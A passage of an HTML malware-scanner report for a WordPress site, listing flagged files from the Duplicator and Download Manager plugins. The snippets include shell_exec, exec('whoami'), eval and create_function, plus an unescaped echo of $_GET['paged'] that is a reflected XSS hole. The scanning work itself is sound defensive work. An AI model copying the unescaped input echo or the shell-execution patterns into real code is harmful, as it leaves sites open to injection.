<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$func&nbsp;=&nbsp;function&nbsp;($_action,&nbsp;&amp;$self,&nbsp;$_text)&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;};'</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$func</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CR...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_148").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_149" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_149").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/classes/utilities/class.u.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_150" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'whoami'</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_geteuid'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_ssdir</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$old_root_perm&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DupLiteSnapLibIOU</span><span style="color: #007700">::</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWindows</span><span style="color: #007700">()&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">strtoupper</span><span style="color: #007700">(</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">PHP_OS</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">))&nbsp;===&nbsp;</span><span style="color: #DD0000">'WIN'</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerUnscramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerScramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_DIE&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'die'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_THROW&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'throw'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_RETURN&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'return'</span><span style="color: #007700">;&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">hasCapability</span><span style="color: #007700">(</span><span style="color: #0000BB">$permis</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_150").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/classes/utilities/class.u.zip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_151" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$errorMessage&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_U</span><span style="color: #007700">::</span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;extracting&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">):&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$stderr</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #0000BB">$errorMessage</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$zipArchive&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">ZipArchive</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">open</span><span style="color: #007700">(</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;opening&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;when&nbsp;extracting.&nbsp;Error&nbsp;code:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$retVal</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extractTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$destinationDirectory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$relativeFilesToExtract</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_151").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/classes/package/class.pack.database.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_152" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">'Warning:&nbsp;Using&nbsp;a&nbsp;password&nbsp;on&nbsp;the&nbsp;command&nbsp;line&nbsp;interface&nbsp;can&nbsp;be&nbsp;insecure.'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #DD0000">"Ran&nbsp;from&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$exePath</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$tblCreateCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$tables</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$tblFilterCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$tblAllCount&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"FILTERED:&nbsp;[</span><span style="color: #007700">{</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">FilterTables</span><span style="color: #007700">}</span><span style="color: #DD0000">]"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"RESPONSE:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$output</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"TABLES:&nbsp;total:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblAllCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;filtered:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblFilterCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;create:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$sql_footer&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"\n\n/*&nbsp;Du...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_152").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/classes/class.db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_153" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$out</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$rc</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$rc&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">getTableCollationList</span><span style="color: #007700">(</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;try&nbsp;{&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">get_results</span><span style="color: #007700">(</span><span style="color: #DD0000">"SHOW&nbsp;TABLE&nbsp;STATUS&nbsp;FROM&nbsp;`</span><span style="color: #007700">{</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">dbname</span><span style="color: #007700">}</span><span style="color: #DD0000">`"</span><span style="color: #007700">);&nbsp;foreach(</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$key&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">))&nbsp;{&nbsp;if&nbsp;(!&nbsp;empty(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$collations</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_unique</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">SORT_STRING</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">ret</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_153").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/download-manager/list-files.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_154" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 43b0d90f <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 43b0d90f)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">echo&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'paged'</span><span style="color: #007700">]?</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'paged'</span><span style="color: #007700">]</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_154").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/download-manager/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 67.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_155" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 873</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
